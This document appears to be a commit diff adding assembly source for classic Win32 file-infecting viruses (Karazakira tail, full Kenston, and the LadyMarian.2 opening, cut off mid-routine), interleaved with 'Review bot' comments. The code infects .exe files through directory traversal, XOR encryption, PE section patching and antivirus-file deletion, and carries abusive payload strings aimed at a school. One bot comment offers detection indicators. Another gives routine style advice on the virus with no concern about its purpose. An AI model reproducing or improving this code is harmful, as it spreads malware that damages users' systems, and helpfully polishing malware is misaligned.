no_round_up:
mul ebx
RET
end_encrypted:
end_static:
heap:
crypt_buffer db length_virus_file dup(?)
padding db 1024 dup(?)
windir db 260 dup(?)
curdir db 260 dup(?)
kernel32 dd ?
GPA_addr dd ?
search_handle dd ?
file_handle dd ?
bytes_read dd ?
infectioncount dd ?
find_data:
FileAttributes dd ?
CreationTime dq ?
LastAccessTime dq ?
LastWriteTime dq ?
FileSize dq ?
wfd_reserved dq ?
FileName db 260 dup(?)
DosFileName db 14 dup(?)
dos_header:
exe_marker dw ?
dosheader_shit db 58 dup(?)
new_header dd ?
pe_header:
pe_marker dd ?
machine dw ?
NumberOfSections dw ?
TimeDateStamp dd ?
DebugShit dq ?
SizeOfOptHeader dw ?
flags dw ?
optional_header:
optional_magic dw ?
linkerversion dw ?
SizeOfCode dd ?
SizeOfDATA dd ?
SizeOfBSS dd ?
EntryPoint dd ?
BaseOfCode dd ?
BaseOfData dd ?
ImageBase dd ?
SectionAlign dd ?
FileAlign dd ?
OSVersion dd ?
OurVersion dd ?
SubVersion dd ?
reserved1 dd ?
SizeOfImage dd ?
SizeOfHeader dd ?
Checksum dd ?
org offset pe_header+length_pe_header
end_mem:
.code
start_1st_gen:
pushad
pushfd
xor ebp, ebp
JMP encrypted
quit_1st_gen:
push 0
push offset caption
push offset message
push 0
call MessageBoxA
push 0
call ExitProcess
caption:
db "Win32.Karazakira by Psychologic"
db 0
message db "Freee palestine...freee palestine", 0
end start_1st_gen
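Review bot: As with the other samples in this commit, a short indicator header is missing and would make the file more useful for detection work. The artifacts visible in the hunk are the appended section named `.Karazakira` with characteristics `0E0000020h` (code, execute, read, write) at `new_section_header`, the `"raK."` comparison on the last section name in `infect`, and `infect_dir` calling `kill_file` on `ANTI-VIR.DAT`, `CHKLIST.MS`, `CHKLIST.CPS` and `AVP.CRC` (attributes reset to 80h, then DeleteFileA) before every directory search. The `decrypt` loop runs in clear text, so everything before `encrypted` is static apart from `crypt_key`, which `infect` derives from GetTickCount. Suggested header: `; Indicators: section ".Karazakira" (chars 0E0000020h); deletes ANTI-VIR.DAT/CHKLIST.MS/CHKLIST.CPS/AVP.CRC in visited dirs; clear-text decryptor before 'encrypted'`.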
+772
@@ -0,0 +1,772 @@
Win32.Kenston
.386
locals
jumps
.model flat, STDCALL
extrn ExitProcess : PROC
org 1000h
.data
db "This is a virus.",0
.code
progstart:
push 0
call ExitProcess
STARTVIRUS:
call relativity
relativity:
pop ebp
cld
mov eax, ebp
db 2dh ;sub eax,
SaveEntry dd (offset relativity- offset progstart)
push eax
sub ebp, offset relativity
mov ecx, dword ptr [esp + 4]
and ecx, 0FFF00000h
mov ebx, 0BFF70000h ;Base address of win95's kernel
cmp ecx, 0BFF00000h ;are we win95 or 98?
je vulnerable
mov ebx, 077f00000h
cmp ecx, ebx ;are we NT?
jne exit
vulnerable:
mov ecx, ebx
mov edx, ecx ;Put imagebase in edx
mov dword ptr [ebp + imagebase], ecx ;Save the imagebase
xor eax, eax ;Clear eax
mov ax, word ptr [edx + 3Ch] ;Get relocation in MZ header
add ecx, eax ;Make ecx start of PE header
cmp word ptr [ecx], 'EP' ;Is everything working right?
jne exit
mov eax, dword ptr [ecx + 120] ;Get RVA of export table
add eax, edx ;Add on the Imagebase
mov dword ptr [ebp + offset ExportTable], eax ;Save the exporttable's address
mov ecx, dword ptr [eax + 24] ;Get number of entry's
dec ecx ;Drop number by one so bottom loop works
mov dword ptr [ebp + offset NumExports], ecx ;Store number of entrys
mov ecx, dword ptr [eax + 28] ;Get RVA of the Address Table
add ecx, edx ;Bias it by the Image Base
mov dword ptr [ebp + offset AddressTable], ecx ;Save the address
mov ecx, dword ptr [eax + 36] ;Get RVA of the Ordinal Table
add ecx, edx ;Bias it by the Image Base
mov dword ptr [ebp + offset OrdinalTable], ecx ;Save the address
mov ecx, dword ptr [eax + 32] ;Get RVA of the Name Table
add ecx, edx ;Bias it by the Image Base
mov dword ptr [ebp + offset NameTable], ecx ;Save the address
;Upon entry:
; ecx=start of RVA String table
; edx=imagebase
; ebx=start of string of function to resolve
;Returns:
; ebx=Address of function
lea ebx, [ebp + offset LoadLibraryaS] ;Function to scan for
push ecx ;Save start of RVA name table
call resolveexport ;Resolve LoadLibraryA
pop ecx
mov dword ptr [ebp + offset loadlibrarya], ebx ;Save address of loadlibrarya
lea ebx, [ebp + GetProcAddressS] ;Load address of function to resolve
call resolveexport ;Resolve getprocaddress
mov dword ptr [ebp + offset getprocaddress], ebx ;Save getprocaddress
lea esi, [ebp + offset APIList] ;Where function strings are started
lea edi, [ebp + offset FindFile] ;Where to store resolved address's
call maketable
lea ebx, [ebp + offset DirSave]
push ebx
push 256
mov ebx, [ebp + offset GetCurrentDir]
call ebx
cmp eax, 00h
je exit ;If not successfull then quit
lea ebx, [ebp + offset Root] ;Go to the root directory
push ebx
mov ebx, dword ptr [ebp + offset SetCurrentDir]
call ebx
cmp eax, 01 ;Were we sucessfull?
jne exit ;If not then exit
call InfectFirstDirectory
lea ebx, [ebp + offset DirSave] ;Go to the original directory
push ebx
mov ebx, dword ptr [ebp + offset SetCurrentDir]
call ebx
exit:
pop eax ;Return to host
jmp eax
InfectFirstDirectory:
lea ebx, [ebp + offset win32_file_data]
push ebx
lea ebx, [ebp + offset DirWildCard]
push ebx
mov ebx, dword ptr [ebp + offset FindFile]
call ebx
cmp eax, -1
je DoneDirScanning
mov dword ptr [ebp + offset DirSearchHandle], eax ;Save our search handle
cmp dword ptr [ebp + offset fileattr], 10h
jne NotADir1
cmp byte ptr [ebp + offset Fullname], '.'
je InfectNextDirectory
call TryInfectingDir ;Try infecting the possible directory
NotADir1:
InfectNextDirectory:
lea ebx, [ebp + offset win32_file_data] ;Where to store fileinfo
push ebx
push dword ptr [ebp + offset DirSearchHandle]
mov ebx, dword ptr [ebp + offset FindNext]
call ebx ;Find next file
cmp eax, 01
jne DoneDirScanningNoneFound
cmp dword ptr [ebp + offset fileattr], 10h
jne NotADir2
cmp byte ptr [ebp + offset Fullname], '.'
je NotADir2
call TryInfectingDir
NotADir2:
jmp InfectNextDirectory
DoneDirScanning:
push dword ptr [ebp + offset DirSearchHandle] ;Close the search handle
mov eax, [ebp + offset FindClose]
call eax
DoneDirScanningNoneFound:
ret
TryInfectingDir:
lea ebx, [ebp + offset FullName] ;Go to the dir we found
push ebx
mov ebx, dword ptr [ebp + offset SetCurrentDir]
call ebx
cmp eax, 01 ;Was it really a directory?
jne NotaDirectory ;If not dont infect it or drop out of it
call FindFirstFile
push dword ptr [ebp + offset DirSearchHandle]
call InfectFirstDirectory
pop dword ptr [ebp+ offset DirSearchHandle]
lea ebx, [ebp + offset DotDot] ;We are going to the previous dir
push ebx
mov ebx, dword ptr [ebp + offset SetCurrentDir]
call ebx
NotaDirectory:
ret
FindFirstFile:
lea ebx, [ebp + offset win32_file_data] ;Where file info goes
push ebx
lea ebx, [ebp + offset EXEWildcard] ;What to search for
push ebx
mov ebx, dword ptr [ebp + offset FindFile] ;Find first file
call ebx
cmp eax, -1 ;Error?
je ExitScanning
mov dword ptr [ebp + offset SearchHandle], eax ;Save search handle
jmp check_file
FindNextFile:
lea ebx, [ebp + offset win32_file_data] ;Where to store fileinfo
push ebx
push dword ptr [ebp + offset SearchHandle] ;Saved search handle
mov ebx, dword ptr [ebp + offset FindNext]
call ebx ;Find next file
cmp eax, 01
jne DoneScanning
check_file:
push 0
push 20h
push 3 ;Open existing file
push 0
push 0
push 80000000h + 40000000h ;Open for reading and writing
lea ebx, [ebp + offset fullname]
push ebx
mov ebx, dword ptr [ebp + offset Createfile]
call ebx
cmp eax, -1 ;Was there any error?
je FindNextFile
mov dword ptr [ebp + FileHandle], eax ;Save file handle
xor eax, eax
lea edi, [ebp + offset WorkBuffer + 56] ;Go to memory to initalize
stosd
stosd ;This fixes a very lame bug, It should really zero out the
;whole workbuffer before each file
;is read but since its a runtime virus its written
;for efficency.
mov edx, 63 ;Read in first 63 bytes
lea ecx, [ebp + offset WorkBuffer] ;Buffer we read into
call Read_file
cmp dword ptr [ebp + offset BytesRead], 63
jb TryNext ;Did we read in enough?
lea ebx, [ebp + offset WorkBuffer]
cmp word ptr [ebx], 'ZM' ;Is it an exe?
jne TryNext ;If it isnt scan next file
add ebx, 3Bh ;Go to the infection marker
cmp byte ptr [ebx], 'a' ;are we infected already?
je TryNext ;If so try next file
inc ebx ;Point to relocation
mov edx, dword ptr [ebx] ;Read the relocation
mov dword ptr [ebp + offset MZReloc], edx ;Save the relocation
call Set_Pointer ;Set file pointer to PE header
cmp eax, 0FFFFFFFFh
je TryNext
mov edx, 120 ;Try to read in first 120 bytes of PE Header
lea ecx, [ebp + offset WorkBuffer] ;Buffer we read into
call Read_file
cmp dword ptr [ebp + offset BytesRead], 120
jne TryNext ;Did we read in enough?
cmp word ptr [ebp + offset WorkBuffer], 'EP' ;Are we in in the peheader?
jne TryNext
mov ebx, dword ptr [ebp + offset HeaderSze] ;Get the HeaderSize
sub ebx, dword ptr [ebp + offset MZReloc] ;Subtract the MZ header
mov dword ptr [ebp + offset HeaderSize], ebx ;Save the PE header's size
cmp ebx, 3000 ;Are we going to overflow our memory?
ja TryNext
push ebx ;Save number of bytes to read in
mov edx, dword ptr [ebp + offset MZReloc] ;Reset pointer back to the peheader
call Set_Pointer
cmp eax, 0FFFFFFFFh
je TryNext
pop edx ;Try to read in HeaderSize bytes
lea ecx, [ebp + offset WorkBuffer] ;Buffer we read into
call Read_file
mov ebx, dword ptr [ebp + offset Headersize] ;How many bytes should have been read?
cmp ebx, dword ptr [ebp + offset BytesRead]
jne TryNext ;Did we read in enough?
xor ecx, ecx
mov cx, word ptr [ebp + offset NumObjects] ;Read in number of objects
cmp cx, 00h ;Are there objects?
je TryNext
xor ebx, ebx
mov bx, word ptr [ebp + offset NTHeaderSze] ;Read in the NTHeaderSize
add ebx, 24 ;Add on the rest
lea edx, dword ptr [ebp + offset WorkBuffer]
;Workbuffer + NTHeadersize + 24 = start of object table
add edx, ebx ;Locate the object table
push edx ;Save start of object table
xor edx, edx
mov eax, ecx ;Handoff # of objects
mov ecx, 40 ;Each object is 40 bytes long
mul ecx ;# objects * 40
sub eax, 40 ;Backtrack to start of last object
pop edx ;Make edx the start of the object table in memory
add edx, eax ;Point edx to last object
mov ebx, dword ptr [edx + 20] ;Load the Physical Offset
push ebx ;Save for use with virtual size
mov eax, dword ptr [edx + 16] ;Load the Physical Size
add ebx, eax ;Add them together
mov edi, dword ptr [ebp + offset FileSize] ;Wont work if file is larger than 4.3 gigs...oh well
add edi, (offset EndVirus - offset StartVirus) + (offset Encryptionframe - offset Encrypt) ;Put on the virussize of our virus in memory
sub edi, ebx ;Determine distance from end of virus to old end of object
add eax, edi ;Make our new physical size
mov ebx, eax
sub ebx, (offset EndVirus- offset StartVirus) + (offset Encryptionframe - offset Encrypt)
mov esi, dword ptr [edx + 12] ;Get RVA for determining entrypointRVA
add esi, ebx ;Find out our entrypointRVA
mov dword ptr [ebp + offset VirusRVA], esi ;Save the virus's RVA
add esi, dword ptr [ebp + offset ImgBase] ;Make the Entrypoint RVA the EntrypointVA
add esi, (offset EncryptionFrame - offset Encrypt) ;Make it point to the encrypted virus in memory
mov dword ptr [ebp + offset VirusVA], esi ;Save the VA for later
mov ecx, dword ptr [ebp + offset FileAlign] ;Get our alignment value
; call File_Align ;Aligns eax
mov dword ptr [edx + 16], eax ;Save our new physical size
pop ebx ;Load the physical offset
mov eax, dword ptr [edx + 8] ;Load the virtual size
add ebx, eax ;Determine end of virtual space
mov edi, dword ptr [ebp + offset FileSize]
add edi, (offset BufferEnd - offset StartVirus) + (offset EncryptionFrame - offset Encrypt) ;Add the virus and its heap to it
sub edi, ebx ;Determine distance between end of virus's heap and end of virtual space
add edi, eax ;Make our virtual size
mov dword ptr [edx + 8], edi ;Save our new virtualsize
mov ecx, dword ptr [edx + 12] ;Get the objects RVA
add ecx, edi ;Make our new ImageSize
mov dword ptr [ebp + offset ImageSize], ecx ;Save our new Imagesize
mov dword ptr [edx + 36], 0E0000040h ;Fix the flags
;We do all the dispatcher and loading shit here
mov ecx, dword ptr [ebp + offset EntrypointRVA]
mov eax, dword ptr [ebp + offset VirusRVA]
mov dword ptr [ebp + offset EntrypointRVA], eax
sub eax, ecx
add eax, (offset relativity - offset startvirus) + (offset EncryptionFrame - offset Encrypt) ;Makeup for the call instruction
mov dword ptr [ebp + offset SaveEntry], eax
mov edx, 3Bh ;Offset we write marker byte at
call Set_Pointer ;Go to place to write marker
mov ebx, 1h ;Write one byte
lea ecx, dword ptr [ebp + offset InfectionMarker] ;The byte to write
call Write_File ;Write the infection marker
mov edx, dword ptr [ebp + offset MZReloc]
call Set_Pointer ;Goto the start of the peheader
mov ebx, dword ptr [ebp + offset BytesRead] ;How much to write
lea ecx, [ebp + offset WorkBuffer] ;Write our modified PE header
call Write_File ;Write it!
lea esi, [ebp + offset StartVirus] ;Copy the virus to the work buffer to encrypt
lea edi, [ebp + offset WorkBuffer] ;Where to copy it
mov dword ptr [ebp + offset StartEncrypt], edi ;We use this below
mov ecx, (offset EndVirus - offset StartVirus) ;How much to copy
rep movsb
inc byte ptr [ebp + offset Key] ;Change the key
Call Encrypt ;Encrypt our code
mov ebx, dword ptr [ebp + VirusVA] ;Get our Entrypoint VA
mov dword ptr [ebp + offset StartEncrypt], ebx ;Store it in the routine
xor edx,edx
call Set_EOF ;Go to EOF
mov ebx, (offset EncryptionFrame - offset Encrypt) ;Size of encryption routine to write
lea ecx, [ebp + offset Encrypt] ;Write encryption routine
call Write_File
mov ebx, (offset EndVirus - offset StartVirus) ;Size of the virus to write
lea ecx, [ebp + offset WorkBuffer] ;Where the encrypted virus is in memory
call Write_File ;Write the virus
lea ebx, [ebp + offset LastWriteTime] ;Get ptr to last writetime
push ebx
sub ebx,8 ;Point it to lastaccesstime
push ebx
sub ebx, 8 ;Point it to createtime
push ebx
push dword ptr [ebp + offset FileHandle] ;Push on the file handle
mov ebx, dword ptr [ebp + offset SetFileTime]
call ebx ;Change the file's times
call Close_File
DoneScanning:
push dword ptr [ebp + offset SearchHandle]
mov eax, [ebp + offset FindClose]
call eax
ExitScanning:
ret
TryNext:
call Close_File
jmp FindNextFile
Read_File:
push 0
lea ebx, [ebp + offset BytesRead] ;Where to put # of bytes read
push ebx
push edx ;Number of bytes to read
push ecx ;Address of buffer
push dword ptr [ebp + offset FileHandle]
mov ebx, dword ptr [ebp + offset ReadFile]
call ebx ;Read the file
ret
Write_File:
push 0
lea eax, [ebp + offset BytesWritten]
push eax ;Where to return # of bytes written
push ebx ;# of bytes to write
push ecx ;Where to write from
push dword ptr [ebp + offset FileHandle]
mov ebx, dword ptr [ebp + offset WriteFile]
call ebx
ret
;Upon Entry:
; edx=New actual address in file
Set_EOF:
push 02h
jmp jumpover
Set_Pointer:
push 00
jumpover:
push 0
push edx ;Where to go in file
push dword ptr [ebp + offset FileHandle]
mov ebx, [ebp + offset SetFilePointer]
call ebx
ret
File_Align:
;Upon entry ecx = alignment value
;eax = Size to process
;eax returns aligned size
push edx
xor edx, edx
div ecx
inc eax
mul ecx
pop edx
ret
Close_File:
push dword ptr [ebp + offset FileHandle]
mov eax, dword ptr [ebp + offset CloseFile]
call eax ;Close the file
ret
;Upon entry:
; esi=Function string table.
; edi=Our address table.
maketable:
lea ebx, [ebp + offset loadlibrarya]
push esi ;Next in string table
call dword ptr [ebx] ;call loadlibrarya
mov edx, eax ;Save module handle
loopuntilnull:
inc esi
cmp byte ptr [esi], 00h
jne loopuntilnull ;loop until at end of string
inc esi
cmp byte ptr [esi], 01h ;Are we on last loop?
je donelooping
lea ebx, [ebp + offset GetProcAddress]
push edx
push esi ;pointer to function name
push edx ;base address of dll
call dword ptr [ebx] ;Getprocaddress in import table
pop edx
stosd
jmp loopuntilnull
donelooping:
ret
resolveexport:
;Upon entry:
; ecx=start of RVA String table
; edx=imagebase
; ebx=start of string of function to resolve
;Returns:
; ebx=Address of function
xor edi,edi
scanstring:
mov esi, dword ptr [ecx] ;Load RVA of string to scan
add esi, edx ;Bias it by the Imagebase
push ebx ;Bad way to save ebx for later use
scanloop:
lodsb
cmp al, 00h ;Is it a null character?
je foundstring
cmp byte ptr [ebx], al ;Does the character match?
jne scannext ;If not scan next string
inc ebx ;Advance the byte we are
;scanning for.
jmp scanloop
scannext:
pop ebx
add ecx, 4 ;Move it to the next export?
inc edi ;Increment the counter
cmp dword ptr [ebp + NumExports], edi ;Are we on last export?
je exit ;Abort if out of exports
jmp scanstring
foundstring:
pop ebx ;Keep the stack nice and neat
add edi, edi ;Multiply by 2 because Ordinal
;Table is 16 bits
mov ebx, dword ptr [ebp + OrdinalTable]
add edi, ebx ;Point edi to getprocaddress's entry
xor ebx, ebx
mov bx, word ptr [edi] ;Get 16bit ordinal number
lea ebx, [ebx * 4] ;Multiply by 4 because the Address
;table is made of double words.
mov esi, dword ptr [ebp + AddressTable]
add esi, ebx ;Point esi to RVA in addresstable
mov ebx, dword ptr [esi] ;Move RVA to ebx
add ebx, edx ;Offset it with the imagebase
ret
Encrypt:
mov ecx, (offset EndVirus - offset StartVirus)
db 0BBh ;Mov ebx,
StartEncrypt dd 000000000h
db 0B0h ;mov al,
Key db 00h
XorLoop:
xor byte ptr [ebx], al
inc ebx
dec ecx
cmp ecx, 00h
jne XorLoop
EncryptionFrame:
ret
STARTDATA:
;We use these to find functions in KERNEL32.DLL's export table
LoadLibraryAS db "LoadLibraryA"
GetProcAddressS db "GetProcAddress"
;These are the functions we need to get the address's of:
APIList:
db "KERNEL32",0
db "FindFirstFileA",0
db "FindNextFileA",0
db "FindClose",0
db "SetFileAttributesA",0
db "SetFileTime",0
db "CreateFileA",0
db "ReadFile",0
db "WriteFile",0
db "SetFilePointer",0
db "CloseHandle",0
db "SetCurrentDirectoryA",0
db "GetCurrentDirectoryA",0,01h ;01h stops the looking up
db "Boles and Manning are arrogant facists."
db " They have no computer sk1llz and KENSTON HIGH SCHOOL's"
db " computers are 0wn3d. I AM BACK KOONS YOU MOTHERFUCKER "
db "dowN wiTh KenSTON..... yOU tRIED tO rID yOUrSELf oF mE BefoRE"
db "bUT fAILED"
db "HAHAHAHAHAHAHAHAHAHAHAHAHAHAHA"
DirWildcard db "*.",0
EXEWildcard db "*.exe",0
InfectionMarker db "a"
DotDot db "..",0
root db "",0
ENDVIRUS:
;These are addresses already offseted by the Image base when saved
ImageBase dd 1 dup (?)
ExportTable dd 1 dup (?)
AddressTable dd 1 dup (?)
NameTable dd 1 dup (?)
OrdinalTable dd 1 dup (?)
NumExports dd 1 dup (?)
GetProcAddressCall dd 1 dup (?)
;These are used in infecting files
BytesWritten dd 1 dup (?)
SearchHandle dd 1 dup (?)
DirSearchHandle dd 1 dup (?)
FileHandle dd 1 dup (?)
BytesRead dd 1 dup (?)
MZReloc dd 1 dup (?)
HeaderSize dd 1 dup (?)
NTHeaderSize dd 1 dup (?)
VirusRVA dd 1 dup (?)
InfectCounter dd 1 dup (?)
VirusVA dd 1 dup (?)
;Place to store the two routines used to look up the rest
LoadLibraryA dd 1 dup (?)
GetProcAddress dd 1 dup (?)
;This becomes a table of these functions address's
FindFile dd 1 dup (?)
FindNext dd 1 dup (?)
FindClose dd 1 dup (?)
SetAttrib dd 1 dup (?)
SetFileTime dd 1 dup (?)
CreateFile dd 1 dup (?)
ReadFile dd 1 dup (?)
WriteFile dd 1 dup (?)
SetFilePointer dd 1 dup (?)
CloseFile dd 1 dup (?)
SetCurrentDir dd 1 dup (?)
GetCurrentDir dd 1 dup (?)
DirSave db 256 dup (?)
win32_file_data:
fileattr dd 1 dup (?)
createtime dd 2 dup (?)
lastaccesstime dd 2 dup (?)
lastwritetime dd 2 dup (?)
dd 1 dup (?)
filesize dd 1 dup (?)
resv dd 2 dup (?)
fullname db 256 dup (?)
realname db 256 dup (?)
WorkBuffer:
Signature dd 1 dup (?)
Cputype dw 1 dup (?)
NumObjects dw 1 dup (?)
dd 3 dup (?)
NtHeaderSze dw 1 dup (?)
Flags dw 1 dup (?)
dd 4 dup (?)
EntrypointRVA dd 1 dup (?)
dd 2 dup (?)
ImgBase dd 1 dup (?)
Objectalign dd 1 dup (?)
Filealign dd 1 dup (?)
dd 4 dup (?)
Imagesize dd 1 dup (?)
Headersze dd 1 dup (?)
db 3000 dup (?)
BufferEnd:
ends
end STARTVIRUS
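Review bot: The PE and attribute constants in check_file are hard-coded at every use — `add ebx, 3Bh`, `cmp dword ptr [ebp + offset fileattr], 10h`, `mov ecx, 40` and `mov dword ptr [edx + 36], 0E0000040h` — and should be named `equ`s so the header layout the routine assumes is stated once rather than rediscovered per line; `Read_File` and `Write_File` would also benefit from a register-contract header like the one `File_Align` already has. The section opens with a bare `Win32.Kenston` line and nothing states the assembler or syntax; the `locals`/`jumps` directives suggest TASM, so a header such as `; Win32.Kenston - TASM, Intel syntax, 32-bit flat model` would make that explicit. `File_Align` is dead code, since its only call site is the commented-out `; call File_Align`, and `call Read_file` versus `Read_File:` spell one label with different case, which presumably only assembles because case sensitivity is off by default — pick one spelling.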
+773
@@ -0,0 +1,773 @@
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;
;
; Win32.LadyMarian.2
; Coded By ValleZ.
; Size: 848h bytes.
;
; This is my second virus and probably virus had not optimized code,or bad ideas,or
; other things,but,as i said,its my second so im excused :P if its a lame virus.
; Well,i thing this is a interesting virus becoz it infect with a method that i hadnt seen
; before(however i dont say it no exist,but i havent seen it). Virus overwrite code
; of host,over entry point,after it has copy host code in .reloc.When it returns to host
; it copy again host to entry point and jmp there.Virus place return to host rutine in
; imagebase + 26h, in word oeminfo and 5 * dword reserved.
; Virus is encrypted with random key.
; Virus no change flags of code section where it overwrite code of host becoz avs heuristic
; could detect it. It use VirtualProtect api to set his memory as writable.
; I want to include some antidebug rutines in virus code but finally i think better not
; becoz size of virus is 848h bytes...and if it grow up very much probably it cannot infect
; any file becoz it will be more big than reloc.
; Virus doesnt increase size of file and no change entry point.
; It places his own SEH and test files with SfcIsFileProtected api when sfc.dll exists.
; It infects all files in his folder that can be infected.
; In NT machines only infect if it has necesary permission.
; In header it only change: ImageBase + 26h to ImageBase + 3ch,with code to return host.
; Byte 1 of TimeDateStamp in PEheader + 08h.
; Flags of .reloc to do it not discarcheable.
;
;
; Payload: show a message box with no button :P close it with ctrl + alt + supr
; No more things.
; This virus is for Lady Mariam,the best girl in the world.
;
; Thx:
; Xezaw,my m3nt0r who shows me all i know :)
; mscorlib,thx for that help that u gave me :) u r a genius :D
; GriYo,thx u too for ur help too :)
;
; Sorry,my english is very bad so plz,excuse me.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.586p
.model flat,stdcall
extrn ExitProcess:proc
sizeVir = endVir - startVir
sizecrypt = decryptz - retHost
.data
db 0
.code
start:
startVir:
push ebx ;registers preserved too
push ecx
push edx
push esi
push edi
push ebp
call d_offset ;delta offset
d_offset:
pop ebp
sub EBP,offset d_offset
jmp decryptz
retHost:
SEHout:
mov esp,00000000h
pop dword ptr fs:[0] ;SEH return
pop ebp
pop ebp ;ebp too was saved,so we can restore it
lea eax,[ebp + offset baseCalc]
xor al,al
xor ecx,ecx
mov cx,100h
add eax,ecx
baseCalc:
sub eax,ecx
cmp word ptr [eax],'ZM' ;search for image base
jne baseCalc
mov esi,[eax + 1ch] ;dir of reloc
add esi,eax ;this header dword is modified
;when file is infected
mov ecx, [eax+3Ch]
add ecx, eax
mov dx,[ecx + 8]
cmp dx,'vz' ;test if this is a infected file,
jne Exit ;second generation,i no test it with
;or ebp,ebp becoz
;with this infection method
;sometimes ebp = 0 in 2º gen.
lea edi,[ebp + startVir]
add eax,26h ;goto return code in image base + 26h
jmp eax
Exit:
push 0
call ExitProcess
ReturnHost:
;return host code.It is put in dos
;header 5 reserved dwords + oeminfo.
mov eax,edi
mov ecx,sizeVir + 1
again1: rep movsb ;copy host code in entry point direction
jcxz next1 ;to recover the host body and
loop again1 ;next jmp to entry point and begin
next1: ;execution of host.
pop ebp
pop edi
pop esi ;i think some programs fails if not preserve
pop edx
pop ecx
pop ebx
jmp eax
ReturnHost_:
vir:
xor edx,edx ;small fix :P
mov [ebp + SfcIsFileProtectedz],edx ;sometimes fault becoz
;thought it has sfc api
;my SetWritrableCode rutine is prepared for with a few
;changes can search a api directly from export.
;really,rutine search VirtualProtect for
;change virus pages to readable,writable and executable
;but putting GetProcAddress offset in repuse + 2 and
;putting a ret in a good site rutine will search
;GetProcAddress and we not spend bytes in repeat code ;)
mov eax,offset GPA
mov dword ptr [ebp + repuse + 2],eax
mov ax,0c35bh ;pop ebx,ret
mov word ptr [ebp + repuse2],ax
lea eax,[ebp + SetWritableCode]
call eax
;of course after use rutine for our propose
;we must rewrite good offset of VP and good code
;where we write ret becoz when infect next generation
;file the code of rutine must be the first
lea ebx,[ebp + offset VP]
mov dword ptr [ebp + repuse + 2],ebx
mov cx,6a54h
mov word ptr [ebp + repuse2],cx
mov edi,[ebp + kern]
mov [EBP + offset GetProcAddressz],EAX
;we have GetProcAddress,we can be happy! We can get all apis we need and
;we can start to infect files ;)
;next code calc apis
;In data apis must be in this form:
;api1kernel 0 api2kernel 0 ... apiNkernel 00 Library1nxt 0 api1nxtLib 0 api2nxtLib 0
;... apiNnxtLib 00 ... LibreriaNnxt 000
;00 is change of library and 000 is finish of apis
lea ESI,[EBP + offset ApisNames]
mov ebx,edi
mov ECX,[EBP + offset GetProcAddressz]
lea EDX,[EBP + offset dirApis]
nextAPI:
push EDX
push ESI
push ebx
mov edx,[ebp + GetProcAddressz]
call edx
pop EDX
mov [EDX],EAX
add EDX,4h
searchApis:
inc ESI
mov AL,byte ptr[ESI]
or AL,AL
jnz searchApis
inc ESI
mov AL,byte ptr[ESI]
or AL,al
jnz nextAPI
inc ESI
mov AL,byte ptr[ESI]
or AL,al
jz allApisFounds
push EDX
cmp ebx,[EBP + offset kern]
je IsKern
IsKern: push ESI
mov eax,dword ptr [ebp + offset LoadLibraryAz]
call eax
or eax,eax ;por la sfc.dll en 9x
jz allApisButSfcNot
mov EBX,EAX
pop EDX
jmp searchApis
allApisButSfcNot:
pop edx
allApisFounds:
SEH: ;set SEH for me,save ebp too
push ebp
lea eax,[ebp + retHost]
push eax
mov eax,fs:[0]
push eax
mov fs:[0],esp
mov dword ptr[ebp + offset SEHout + 1],esp
;payload only show a message box if 23-7-XX,but when i had a moment ill put some payload
;a few more original :P
Payload: ;payload (only 9x)
mov eax,dword ptr [ebp + offset GetVersionz]
call eax
test EAX,08000000h
jnz FirstFile
lea ESI, [EBP + offset SystemTime]
push ESI
mov eax,[EBP + offset GetSystemTimez]
call eax
cmp [ESI.ST_wMonth],7
jne FirstFile
cmp [ESI.ST_wDay],23
jne FirstFile
lea eax,[ebp + pay]
lea esi,[ebp + paytit]
push 07h
push esi
push eax
push 0
mov eax,dword ptr [ebp + offset MessageBoxAz]
call eax
FirstFile: ;infect all .exe in his folder that could infect
lea eax,[ebp + offset files]
lea ESI,[ebp + offset WIN32_FIND_DATA]
push ESI
push EAX
mov eax,dword ptr [ebp + offset FindFirstFileAz]
call eax
inc eax
jz retHost
dec eax
mov [ebp + handFile],eax
jmp infection
NextFile:
push dword ptr [ebp+WFD_dwFileAttributes]
lea eax, [ebp + WFD_szFileName]
push eax
mov eax,dword ptr [ebp + offset SetFileAttributesAz]
call eax
lea ESI,[ebp + offset WIN32_FIND_DATA]
mov eax,[ebp + handFile]
push esi
push eax
mov eax, dword ptr [ebp + offset FindNextFileAz]
call eax
or eax,eax
jz retHost
infection:
lea edi,[ebp + offset WFD_szFileName]
mov eax,dword ptr [ebp + offset GetVersionz]
call eax
test EAX,08000000h
jz _9x
NT:
;in NT only infect if have permiss
mov eax,[ebp + offset WFD_dwFileAttributes]
test eax,1915h
jnz NextFile
_9x: ;sfp?? i test it for NT and 9x becoz i have listened
;millenium have it too,true?
push edi
push 0
mov eax,[ebp + SfcIsFileProtectedz]
or eax,eax
jz nosfc
call eax
or eax,eax
jnz NextFile
nosfc:
;next part is tipycal file mapping
push 80h
push edi
mov eax, dword ptr[ebp + offset SetFileAttributesAz]
call eax
xor eax,eax
push eax
push eax
push 3
push eax
inc eax
push eax
push 0C0000000h
push edi
mov eax,dword ptr [ebp + offset CreateFileAz]
call eax
inc eax
or eax,eax
jz Closed
dec eax
mov [ebp + offset CreateFileHand],eax
xor ebx,ebx
push ebx
push dword ptr[ebp+ offset WFD_nFileSizeLow]
push ebx
push 4
push ebx
push eax
mov eax, dword ptr [ebp + offset CreateFileMappingAz]
call eax
or eax,eax
jz CloseFile
mov [ebp + offset CreateFileMappingHand],eax
push dword ptr[ebp + offset WFD_nFileSizeLow]
xor ebx,ebx
push ebx
push ebx
push 000F001Fh
push eax
mov eax, dword ptr [ebp + offset MapViewOfFilez]
call eax
or eax,eax
jz CloseMapping
mov [ebp + offset MapViewOfFileHand],eax
mov edi,eax
cmp word ptr [edi],'ZM' ;test if PE file
jne CloseView
cmp word ptr[edi + 8],4
jne CloseView
mov esi,[edi + 3ch]
add esi,edi
cmp word ptr[esi],'EP'
jne CloseView
mov ax,[esi + 8] ;not infected yet??
cmp ax,'vz'
je CloseView
mov eax,[esi + 28h]
xor ebx,ebx
mov bx,word ptr[esi + 14h]
add ebx,18h
add ebx,esi
push ebx
BuscaEntrySec:
mov ecx,dword ptr[ebx + 0ch]
add ecx,dword ptr[ebx + 10h] ;search for entryPoint section,
cmp eax,ecx ;the section where is entryPoint.
